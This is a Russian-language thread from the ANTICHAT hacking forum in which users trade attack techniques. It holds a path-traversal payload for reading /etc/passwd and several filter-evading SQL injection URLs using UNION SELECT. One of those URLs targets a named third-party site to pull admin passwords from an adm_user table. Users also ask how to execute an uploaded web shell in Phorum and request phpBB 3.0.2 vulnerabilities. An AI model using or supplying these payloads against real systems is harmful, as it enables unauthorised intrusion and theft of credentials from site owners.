ANTICHAT — форум по информационной безопасности, OSINT и технологиям

пацаны это инклюд?

Fatal error: require() [function.require]: Failed opening required 'articles/../../../../../../../../../etc/php.ini/text.htm' (include_path='.:/usr/local/share/pear') in /pub/home/teplotex/htdocs/fedorov/warlib/index.php on line 115

Да, попробуй так ../../../../../../../../../../../../../etc/passwd%00

,...

[QUOTE="boortyhuhtyu"]
boortyhuhtyu said:

Не могу разобратся. Значит запрос к базе такой

$dbb=mysql_query("select * from zas where id='{$_GET['id']}'");

$dbb=mysql_fetch_array($dbb);

получаетса id это int, и при запросе

http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,2,3/*'

выводитса 2...

но если делаю запрос

http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,user(),3/*'

то выдает Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in Z:\home\test1.ru\www\index.php on line ...

как правильно сделать?

попробуй

http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,unhex(hex(user())),3/*'

http://test1.ru/?id=99999'/**//*!union*//**//*!select*//**/1,/*!user()*/,3/*'

Загружаю шелл в профайл админа cms Phorum, оказывается записывает файл в бд, как сделать исполнение кода? (http://127.0.0.1/file.php?0,file=1,filename=shell.php)

помогло...

Возможно ли вскрыть такое?)

http://www.luman.lg.ua/content.php?type=about_0400'

http://www.luman.lg.ua/strelby.php?title=%CF%F3%EB%E8+%22%CB%FE%EC%E0%ED% 22+FT-0%2C68&id=70+and+1=0+union+select+1,2,3,4,5,6,7,8, pass+from+adm_user

пробелы необходимо убрать

Подкиньте уязвимостей по phpbb 3.0.2...

Из тех что есть в этой темке большинство подразумевает наличие уязвимых модов либо права админа... У меня нет возможности даже зарегистрироваться(регист� �ация там только по подтверждению админом), а из модов, насколько я понял, только некие arcade и tosviolation.